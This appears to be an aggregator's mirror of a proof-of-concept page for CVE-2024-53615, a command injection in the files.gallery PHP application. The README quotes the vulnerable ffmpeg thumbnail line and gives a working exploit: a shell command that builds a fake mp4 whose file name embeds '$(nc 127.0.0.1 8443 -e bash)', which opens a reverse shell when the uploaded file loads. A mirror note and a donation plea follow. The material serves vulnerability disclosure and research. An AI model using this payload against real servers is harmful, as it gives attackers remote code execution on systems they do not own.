CVE-2024-53615 PoC — Files 安全漏洞

Source

https://github.com/beune/CVE-2024-53615

Associated Vulnerability

Title:Files 安全漏洞 (CVE-2024-53615)
Description:Files是Karl Ward个人开发者的一个单文件 PHP 应用程序。可以拖放到任何目录中，允许浏览其中的文件和目录。 Files v0.3.0版本至0.11.0版本存在安全漏洞，该漏洞源于存在命令注入漏洞，允许远程攻击者通过精心设计的视频文件执行任意代码。

Description

CVE-2024-53615

Readme

# CVE-2024-53615

`files.gallery` contains an RCE vulnerability. Prerequisites:

- `ffmpeg` in `PATH`
- `config.php`: `'allow_upload' => true`
- `exec` must be enabled in PHP config

The vulnerability is in the following line, which generates video previews:

```php
$cmd = $ffmpeg_path . ' -ss 3 -t 1 -hide_banner -i "' . str_replace('"', '\"', $this->path) . '" -frames:v 1 -an -vf "thumbnail,scale=480:320:force_original_aspect_ratio=increase,crop=480:320" -r 1 -y -f mjpeg "' . $cache . '" 2>&1';
```

As `$this->path` is user controllable, we can construct a malicious file whose title is a bash command substitution. It is important that this file must contain e.g., the mp4 magic bytes and the filename must end with `.mp4`:

```sh
$ echo "AAAAIGZ0eXBpc29tAAACAGlzb21pc28yYXZjMW1wNDEAAQv7bW9vdgAAAGxtdmhk" | base64 -d > '$(nc 127.0.0.1 8443 -e bash).mp4'
```

If we upload this file, and refresh the page to make the application load the file, we obtain a shell on our local machine.

Note: the command is stored in the filename, so reverse shell possibilities are limited due to name length constraints.

File Snapshot


 [4.0K]  /data/pocs/ad0103e8a0a069644be3a84634af226f17509757
├── [2.0K]  exploit.py
└── [1.1K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!